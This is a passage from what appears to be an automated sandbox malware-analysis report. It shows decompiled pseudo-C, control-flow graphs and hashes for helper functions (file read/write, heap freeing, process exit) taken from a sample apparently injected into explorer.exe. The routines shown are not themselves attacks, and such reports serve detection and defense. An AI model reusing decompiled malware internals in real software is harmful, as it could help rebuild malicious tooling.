                                                                                                                                                                                              • Opcode Fuzzy Hash: 2eddaa3b128a40b1e274007289c865b4af56ee60a4203d361925b82a4c1a17eb
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0AE32B101185FC7147B69EC4486AF3ED9F587D17504139F606D3550EAB09E40C690
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8B3C7 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 261 2f8b3c7-2f8b3d6 262 2f8b3d8-2f8b3da 261->262 263 2f8b3df-2f8b3ea call 2f8b2fe 261->263 264 2f8b464-2f8b466 262->264 267 2f8b3ec-2f8b3fe 263->267 268 2f8b460 263->268 271 2f8b400-2f8b411 call 2f88bde 267->271 272 2f8b446-2f8b451 267->272 269 2f8b462-2f8b463 268->269 269->264 271->272 276 2f8b413-2f8b425 call 2f8b36c 271->276 272->268 277 2f8b453-2f8b45f call 2f88bf4 272->277 276->272 282 2f8b427-2f8b42a 276->282 277->268 282->272 283 2f8b42c-2f8b435 282->283 284 2f8b439-2f8b444 FindCloseChangeNotification 283->284 285 2f8b437 283->285 284->269 285->284
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8B3C7(char _a4, intOrPtr* _a8) {
				char _v8;
				void* __ecx;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t25;
				void* _t29;
				intOrPtr _t42;
				char _t44;

				_t32 = _a4;
				_t44 = 0;
				_v8 = 0;
				if(_a4 != 0) {
					_t29 = E02F8B2FE(_t32);
					if(_t29 == 0) {
						L12:
						_t14 = 0;
						L13:
						L14:
						return _t14;
					}
					_t15 =  *0x2f9f818; // 0x508f6c8
					_t42 =  *((intOrPtr*)(_t15 + 0xf4))(_t29, 0);
					if(_t42 == 0) {
						L10:
						_t17 =  *0x2f9f818; // 0x508f6c8
						 *((intOrPtr*)(_t17 + 0x30))(_t29);
						if(_t44 != 0) {
							E02F88BF4( &_v8, 0);
						}
						goto L12;
					}
					_t4 = _t42 + 1; // 0x1
					_t22 = E02F88BDE(_t4); // executed
					_t44 = _t22;
					_v8 = _t44;
					if(_t44 == 0) {
						goto L10;
					}
					_t24 = E02F8B36C(_t29, _t44, _t42,  &_a4); // executed
					if(_t24 == 0 || _a4 != _t42) {
						goto L10;
					} else {
						_t25 = _a8;
						 *((char*)(_t42 + _t44)) = 0;
						if(_t25 != 0) {
							 *_t25 = _t42;
						}
						FindCloseChangeNotification(_t29);
						_t14 = _t44;
						goto L13;
					}
				}
				_t14 = 0;
				goto L14;
			}














                                                                                                                                                                                              0x02f8b3cb
                                                                                                                                                                                              0x02f8b3cf
                                                                                                                                                                                              0x02f8b3d1
                                                                                                                                                                                              0x02f8b3d6
                                                                                                                                                                                              0x02f8b3e6
                                                                                                                                                                                              0x02f8b3ea
                                                                                                                                                                                              0x02f8b460
                                                                                                                                                                                              0x02f8b460
                                                                                                                                                                                              0x02f8b462
                                                                                                                                                                                              0x02f8b464
                                                                                                                                                                                              0x02f8b466
                                                                                                                                                                                              0x02f8b466
                                                                                                                                                                                              0x02f8b3ec
                                                                                                                                                                                              0x02f8b3fa
                                                                                                                                                                                              0x02f8b3fe
                                                                                                                                                                                              0x02f8b446
                                                                                                                                                                                              0x02f8b446
                                                                                                                                                                                              0x02f8b44c
                                                                                                                                                                                              0x02f8b451
                                                                                                                                                                                              0x02f8b459
                                                                                                                                                                                              0x02f8b45f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b451
                                                                                                                                                                                              0x02f8b400
                                                                                                                                                                                              0x02f8b404
                                                                                                                                                                                              0x02f8b409
                                                                                                                                                                                              0x02f8b40b
                                                                                                                                                                                              0x02f8b411
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b41c
                                                                                                                                                                                              0x02f8b425
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b42c
                                                                                                                                                                                              0x02f8b42c
                                                                                                                                                                                              0x02f8b42f
                                                                                                                                                                                              0x02f8b435
                                                                                                                                                                                              0x02f8b437
                                                                                                                                                                                              0x02f8b437
                                                                                                                                                                                              0x02f8b43f
                                                                                                                                                                                              0x02f8b442
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b442
                                                                                                                                                                                              0x02f8b425
                                                                                                                                                                                              0x02f8b3d8
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,02F90BBE,00000000,00000000,02FAEFE0,02F9C9A0,00000000,02F9C9A0,00000000,00000000,?,00000294,00000000,0508FB48,00000400), ref: 02F8B43F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                              • Opcode ID: 21e77eb7435e57f56fe5b1f87b0bf0a3283438fb65c88220e0760c061050cef6
                                                                                                                                                                                              • Instruction ID: 46368e70d66d7c7fecda9562ac68b9309b349b722b33876ca95239640bcc38ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 21e77eb7435e57f56fe5b1f87b0bf0a3283438fb65c88220e0760c061050cef6
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF11B672B0121AABD720AF69DD81F5AF7DDEF446D8F104165EA01C7254DB30D900C790
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8B36C Relevance: 1.5, APIs: 1, Instructions: 45fileCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 286 2f8b36c-2f8b385 287 2f8b3a4-2f8b3b2 ReadFile 286->287 288 2f8b3b4-2f8b3b8 287->288 289 2f8b387-2f8b38b 287->289 290 2f8b3b9-2f8b3be 289->290 291 2f8b38d-2f8b3a3 289->291 292 2f8b3c0 290->292 293 2f8b3c2-2f8b3c5 290->293 291->287 292->293 293->288
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02F8B421,00000000,00000000,?,02F90BBE,00000000), ref: 02F8B3AA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                              • Opcode ID: 4c21dad93b15076eb0a47025943a8dfea6d09abaf226f5501be31c8a4d429835
                                                                                                                                                                                              • Instruction ID: a058d4ca808567597b0b60716a686647b87360aa3a912d7a1a2131998565baa0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c21dad93b15076eb0a47025943a8dfea6d09abaf226f5501be31c8a4d429835
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1601FF72A00219FFDB11DB95CC45BAAB7ACEB44699F104165A505D7100E270EA00D7A0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8B31F Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 294 2f8b31f-2f8b330 295 2f8b361-2f8b363 294->295 296 2f8b332-2f8b354 WriteFile 294->296 299 2f8b364-2f8b367 295->299 297 2f8b368-2f8b36a 296->297 298 2f8b356-2f8b35f 296->298 297->299 298->295 298->296
                                                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                                                              			E02F8B31F(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









                                                                                                                                                                                              0x02f8b31f
                                                                                                                                                                                              0x02f8b322
                                                                                                                                                                                              0x02f8b323
                                                                                                                                                                                              0x02f8b326
                                                                                                                                                                                              0x02f8b328
                                                                                                                                                                                              0x02f8b32b
                                                                                                                                                                                              0x02f8b330
                                                                                                                                                                                              0x02f8b361
                                                                                                                                                                                              0x02f8b363
                                                                                                                                                                                              0x02f8b332
                                                                                                                                                                                              0x02f8b332
                                                                                                                                                                                              0x02f8b332
                                                                                                                                                                                              0x02f8b354
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b356
                                                                                                                                                                                              0x02f8b359
                                                                                                                                                                                              0x02f8b35f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b35f
                                                                                                                                                                                              0x02f8b368
                                                                                                                                                                                              0x02f8b368
                                                                                                                                                                                              0x02f8b364
                                                                                                                                                                                              0x02f8b367

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,02F8956A,?), ref: 02F8B34C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                              • Opcode ID: fd24a82f73c1e390c8b81d72a77c7fea252f3e3d23ee44482da71dbfac9ac273
                                                                                                                                                                                              • Instruction ID: 095e6657627a966743e5fb180f5b3dfc04bad88b7dae3db674df313ea449ed6f
                                                                                                                                                                                              • Opcode Fuzzy Hash: fd24a82f73c1e390c8b81d72a77c7fea252f3e3d23ee44482da71dbfac9ac273
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F01D72A10218BFDB10DFA8D885FEBB7ACFB09688F104569A605E7100D770EE40DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8C879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 300 2f8c879-2f8c892 302 2f8c894-2f8c895 300->302 303 2f8c896-2f8c8a3 call 2f8c862 300->303 306 2f8c8b9-2f8c8c4 FindCloseChangeNotification 303->306 307 2f8c8a5-2f8c8a8 303->307 310 2f8c8c6-2f8c8c8 306->310 308 2f8c8aa-2f8c8af 307->308 309 2f8c8b5-2f8c8b7 307->309 308->309 309->310
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8C879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x2f9f820; // 0x508f8b8
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E02F8C862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x2f9f818; // 0x508f6c8
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                                              0x02f8c87d
                                                                                                                                                                                              0x02f8c885
                                                                                                                                                                                              0x02f8c88d
                                                                                                                                                                                              0x02f8c892
                                                                                                                                                                                              0x02f8c89a
                                                                                                                                                                                              0x02f8c89f
                                                                                                                                                                                              0x02f8c8a3
                                                                                                                                                                                              0x02f8c8c1
                                                                                                                                                                                              0x02f8c8c4
                                                                                                                                                                                              0x02f8c8a5
                                                                                                                                                                                              0x02f8c8a8
                                                                                                                                                                                              0x02f8c8aa
                                                                                                                                                                                              0x02f8c8b2
                                                                                                                                                                                              0x02f8c8b2
                                                                                                                                                                                              0x02f8c8b5
                                                                                                                                                                                              0x02f8c8b5
                                                                                                                                                                                              0x02f8c8c8
                                                                                                                                                                                              0x02f8c895
                                                                                                                                                                                              0x02f8c895
                                                                                                                                                                                              0x02f8c895

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 945cb1c61f28caa11f90bdd46ff9727c7f2b3e7c49854e32552e3e504f92c3f7
                                                                                                                                                                                              • Instruction ID: 400a3f0685f14f1b6f377a424a44758fa0dc5c58a4c0389308e151dff5069925
                                                                                                                                                                                              • Opcode Fuzzy Hash: 945cb1c61f28caa11f90bdd46ff9727c7f2b3e7c49854e32552e3e504f92c3f7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CF03A32E90108EBDB64EBA4D905E9DB3F8FB087C5F1146A6E601E7150DB30DA10DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F88BF4 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F88BF4(char _a4, intOrPtr _a8) {
				char _t3;
				intOrPtr _t4;
				void* _t9;

				_t3 = _a4;
				if(_t3 == 0) {
					return _t3;
				}
				_t9 =  *_t3;
				if(_t9 != 0) {
					 *_t3 =  *_t3 & 0x00000000;
					_t4 = _a8;
					if(_t4 != 0xffffffff) {
						if(_t4 == 0xfffffffe) {
							_t4 = E02F8A456(_t9);
						}
					} else {
						_t4 = E02F8A43D(_t9);
					}
					E02F88D6D(_t9, 0, _t4);
					_t3 = RtlFreeHeap( *0x2f9f900, 0, _t9); // executed
				}
				return _t3;
			}






                                                                                                                                                                                              0x02f88bf7
                                                                                                                                                                                              0x02f88bfc
                                                                                                                                                                                              0x02f88c42
                                                                                                                                                                                              0x02f88c42
                                                                                                                                                                                              0x02f88bff
                                                                                                                                                                                              0x02f88c03
                                                                                                                                                                                              0x02f88c05
                                                                                                                                                                                              0x02f88c08
                                                                                                                                                                                              0x02f88c0e
                                                                                                                                                                                              0x02f88c1c
                                                                                                                                                                                              0x02f88c20
                                                                                                                                                                                              0x02f88c20
                                                                                                                                                                                              0x02f88c10
                                                                                                                                                                                              0x02f88c11
                                                                                                                                                                                              0x02f88c16
                                                                                                                                                                                              0x02f88c29
                                                                                                                                                                                              0x02f88c3a
                                                                                                                                                                                              0x02f88c3a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02F88C3A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                              • Opcode ID: f1e9c8ecf3e713ea3228b06dd5d9c3a297db17c384abd1f103e911aff2cc7bb6
                                                                                                                                                                                              • Instruction ID: c71e80bd3583830a83646e02214a3125c9dcc07583548e828689d21f7e226252
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1e9c8ecf3e713ea3228b06dd5d9c3a297db17c384abd1f103e911aff2cc7bb6
                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F0A031E0352CAFCE213A24AC40BAAF7589F02BF4F944601FB25DB1E0C721A8404AE4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F861C5 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F861C5() {
				char _v44;
				signed int _t8;
				intOrPtr _t15;
				intOrPtr _t16;
				void* _t23;
				void* _t32;

				_t8 =  *0x2f9f81c; // 0x2fb0000
				E02F9370B(_t8, _t23,  *((intOrPtr*)(_t8 + 0x224))); // executed
				E02F88BC9();
				E02F89591();
				E02F8D206();
				E02F86412(); // executed
				E02F8DD81(_t23);
				_t15 =  *0x2f9f81c; // 0x2fb0000
				 *((intOrPtr*)(_t15 + 0xa4)) = 2;
				_t16 =  *0x2f9f81c; // 0x2fb0000
				E02F8B557( &_v44,  *((intOrPtr*)(_t16 + 0xac)) + 7,  *((intOrPtr*)(_t16 + 0xac)) + 7);
				E02F8C164( &_v44);
				E02F88D6D( &_v44, 0, 0x27);
				E02F8611B( &_v44,  *((intOrPtr*)(_t16 + 0xac)) + 7,  *((intOrPtr*)(_t16 + 0xac)) + 7, _t32);
				ExitProcess(0);
			}









                                                                                                                                                                                              0x02f861c8
                                                                                                                                                                                              0x02f861d6
                                                                                                                                                                                              0x02f861db
                                                                                                                                                                                              0x02f861e0
                                                                                                                                                                                              0x02f861e5
                                                                                                                                                                                              0x02f861ea
                                                                                                                                                                                              0x02f861ef
                                                                                                                                                                                              0x02f861f4
                                                                                                                                                                                              0x02f861fc
                                                                                                                                                                                              0x02f86206
                                                                                                                                                                                              0x02f86214
                                                                                                                                                                                              0x02f8621c
                                                                                                                                                                                              0x02f86229
                                                                                                                                                                                              0x02f86231
                                                                                                                                                                                              0x02f8623d

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 02F88BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,02F86502), ref: 02F88BD2
                                                                                                                                                                                                • Part of subcall function 02F8DD81: GetVersionExA.KERNEL32(02FB0000,02FB0000,?,02F83B9C), ref: 02F8DDF4
                                                                                                                                                                                                • Part of subcall function 02F8DD81: GetCurrentProcessId.KERNEL32(?,02F83B9C), ref: 02F8DDFA
                                                                                                                                                                                                • Part of subcall function 02F8C164: FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,02F842E1), ref: 02F8C197
                                                                                                                                                                                                • Part of subcall function 02F88D6D: memset.MSVCRT ref: 02F88D7F
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,?), ref: 02F8623D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$ChangeCloseCreateCurrentExitFindHeapNotificationVersionmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2933066355-0
                                                                                                                                                                                              • Opcode ID: e4f707b33b7e273fae16d5afe0433e7f9568a45061110b5d2ac80d8c9ed7eebd
                                                                                                                                                                                              • Instruction ID: cb283373f6835391a2ab83c9610cb5eff2b2cfc2e7e9b5e538af9c3bffc22815
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f707b33b7e273fae16d5afe0433e7f9568a45061110b5d2ac80d8c9ed7eebd
                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F062B1B402088FD700F7B4DC8AF9DB7E6AF08780F054570D605DB251DA709415CF62
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8B2BA Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8B2BA(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x2f9f818; // 0x508f6c8
						 *((intOrPtr*)(_t6 + 0x88))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






                                                                                                                                                                                              0x02f8b2c4
                                                                                                                                                                                              0x02f8b2d8
                                                                                                                                                                                              0x02f8b2dd
                                                                                                                                                                                              0x02f8b2e6
                                                                                                                                                                                              0x02f8b2e8
                                                                                                                                                                                              0x02f8b2f2
                                                                                                                                                                                              0x02f8b2f2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b2f8
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,02F89552), ref: 02F8B2D5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: a55e264e72bdce5aefe7c441fc7cabfe3df3c56e4430bd6a6bd994f636788839
                                                                                                                                                                                              • Instruction ID: bbb7d8ef750525ccbc858947be35ac96ee61bd54f183a79b3de365a93661a2e8
                                                                                                                                                                                              • Opcode Fuzzy Hash: a55e264e72bdce5aefe7c441fc7cabfe3df3c56e4430bd6a6bd994f636788839
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E092B2B401147EE3302669ACC8FABA29CD78A7FAF114770F725D7180C6108C5183B0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8B467 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E02F8B467(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t5;
				void* _t6;
				void* _t10;
				long _t15;
				void* _t17;

				_t15 = 2;
				_t5 = E02F8B2BA(_a4, _t15);
				_t17 = _t5;
				if(_t17 != 0) {
					_t6 = E02F8B31F(_t17, _a8, _a12); // executed
					if(_t6 != 0) {
						FindCloseChangeNotification(_t17);
						return 0;
					}
					_t10 = 0xfffffffe;
					return _t10;
				}
				return _t5 | 0xffffffff;
			}








                                                                                                                                                                                              0x02f8b470
                                                                                                                                                                                              0x02f8b471
                                                                                                                                                                                              0x02f8b476
                                                                                                                                                                                              0x02f8b47a
                                                                                                                                                                                              0x02f8b489
                                                                                                                                                                                              0x02f8b491
                                                                                                                                                                                              0x02f8b49e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b4a1
                                                                                                                                                                                              0x02f8b495
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8b495
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: ca5ba43867d5d9ed2551382c768980e0b54cd2ca67dc9554a3e48c7174e223e0
                                                                                                                                                                                              • Instruction ID: 1e2cd61d6fe7f7ddf16df0891ea1ad9f010f3735a1a8d4361052c9d3b95cecfb
                                                                                                                                                                                              • Opcode Fuzzy Hash: ca5ba43867d5d9ed2551382c768980e0b54cd2ca67dc9554a3e48c7174e223e0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E0D832B546256B8B217E68ED16E9EB749EF493F8B208711FB25CB2D0DF30D41186D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 02F8C164 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E02F8C164(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x2f9f818; // 0x508f6c8
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xc8))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x2f9f818; // 0x508f6c8
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xcc))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t12);
					return _t13;
				}
				return _t5;
			}








                                                                                                                                                                                              0x02f8c164
                                                                                                                                                                                              0x02f8c16c
                                                                                                                                                                                              0x02f8c171
                                                                                                                                                                                              0x02f8c177
                                                                                                                                                                                              0x02f8c17b
                                                                                                                                                                                              0x02f8c17d
                                                                                                                                                                                              0x02f8c182
                                                                                                                                                                                              0x02f8c18b
                                                                                                                                                                                              0x02f8c18f
                                                                                                                                                                                              0x02f8c18f
                                                                                                                                                                                              0x02f8c197
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8c19a
                                                                                                                                                                                              0x02f8c19e

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001,02F842E1), ref: 02F8C197
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                              • Opcode ID: b256e46fe7380ba9f62c21d2f41f19248763983a57e5c7c2fa1939839813b0ab
                                                                                                                                                                                              • Instruction ID: 5fae68bc26df9bcb71b5c6729c5cc8e8f7ce432690e91378ac835c8134e48a22
                                                                                                                                                                                              • Opcode Fuzzy Hash: b256e46fe7380ba9f62c21d2f41f19248763983a57e5c7c2fa1939839813b0ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: C3E04F32B011215BD3645B69BC4DFB7BBA8EB85AA5B154379F609C7240CB208853C7F0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

